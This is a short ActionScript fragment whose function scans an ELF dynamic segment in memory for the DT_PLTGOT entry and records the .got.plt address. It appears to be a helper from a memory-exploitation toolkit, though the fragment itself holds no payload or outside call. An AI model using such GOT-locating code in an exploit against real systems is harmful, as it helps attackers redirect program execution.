private function set_got_plt():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_PLTGOT) {
sec_got_plt = e_ba.read(entry + 4)
return
}
}

throw new Error()
}
}
}